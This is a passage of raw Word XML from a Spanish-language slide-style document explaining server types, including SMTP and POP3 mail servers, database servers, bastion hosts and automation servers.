          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7424A2E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="188"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8A4F49" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2193"/>
          <w:tab w:val="left" w:pos="2195"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="2195" w:right="619" w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando presiona el botón "Enviar" en su programa de correo electrónico (cliente de correo electrónico), el programa se conectará a un servidor en la red / Internet que se llama </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> servidor SMTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>es un acrónimo de Simple Mail Transfer Protocol y es un protocolo que se utiliza cuando los correos electrónicos se entregan de clientes a servidores y de servidores a otros servidores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21107591" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="136"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7B118C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2193"/>
          <w:tab w:val="left" w:pos="2195"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="2195" w:right="771" w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando descargue correos electrónicos en su programa de correo electrónico, el programa se conectará a un servidor en la red que se conoce como </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> servidor POP3</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5CE17A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="660" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2942F950" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1523"/>
        </w:tabs>
        <w:spacing w:before="51"/>
        <w:ind w:left="1523" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Servidor de base de datos </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>(o servidor SQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09632C6F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="121"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CAC64E8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2244"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="2244" w:right="1570"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Los servidores de bases de datos </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>se utilizan para almacenar y administrar bases de datos que se almacenan en el servidor y para proporcionar acceso a los datos para los usuarios autorizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7F62B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129B99F4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="146"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766DE04E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2243"/>
        </w:tabs>
        <w:ind w:left="2243" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Un servidor de base de datos es útil para las organizaciones que tienen una gran cantidad de datos con los que tratar de forma regular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70431927" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5928E115" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104FBC79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2243"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="2243" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>También permite a los usuarios y aplicaciones acceder de forma centralizada a los datos a través de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE1944" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781C1F17" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="177"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E1A9F1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2244"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="2244" w:right="625"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Varias operaciones, como modificar datos, agregar y eliminar datos, etc., se realizan a través de consultas SQL [Structured Query Language].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114174AB"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960" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1725901A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1481"/>
        </w:tabs>
        <w:spacing w:before="51"/>
        <w:ind w:left="1481" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">bastión-host </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>(jump-server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715EFF8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="121"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA3AB40" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2203"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1036"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">host bastión </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>es un equipo de propósito especial en una red diseñada y configurada específicamente para resistir ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED8BE6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281C9B45" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="193"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7D800E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2203"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="873"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15747072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="753EB035" wp14:editId="00FAC763">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3735323</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>705642</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4707890" cy="324167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7890" cy="3241675"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4707890" cy="3241675"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="110" name="Image 110"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId51" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4707635" cy="3241548"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="111" name="Image 111"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId52" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="192023" y="191985"/>
                            <a:ext cx="4337304" cy="2871216"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="072274BF" id="Group 109" o:spid="_x0000_s1026" style="position:absolute;margin-left:294.1pt;margin-top:55.55pt;width:370.7pt;height:255.25pt;z-index:15747072;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="47078,324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">
                <v:shape id="Image 110" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:47076;height:3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">
                  <v:imagedata r:id="rId53" o:title=""/>
                </v:shape>
                <v:shape id="Image 111" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1920;top:1919;width:43373;height:2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">
                  <v:imagedata r:id="rId54" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El equipo generalmente aloja una sola aplicación, por ejemplo, un servidor proxy, y todos los demás servicios se eliminan o limitan para reducir la amenaza para el equipo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A678B2"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640" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7115CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:before="66"/>
        <w:ind w:left="1824"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Servidor de automatización </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535E9B89" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2543"/>
        </w:tabs>
        <w:spacing w:before="575"/>
        <w:ind w:left="2543" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los servidores de automatización son un aspecto crucial del flujo de trabajo de desarrollo de software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F81C1FD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFC0457" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="187"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623F5A24" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2544"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="235" w:lineRule="auto"/>
        <w:ind w:right="1172"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ayuda a automatizar las partes del desarrollo de software relacionadas con la creación, las pruebas y la implementación, lo que facilita la integración continua y la entrega continua.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3371FD6E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37144372" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="106"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6C4821" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2543"/>
        </w:tabs>
        <w:ind w:left="2543" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Algunos de los ejemplos son:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1817DA0E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3263"/>
        </w:tabs>
        <w:spacing w:before="330"/>
        <w:ind w:left="3263" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
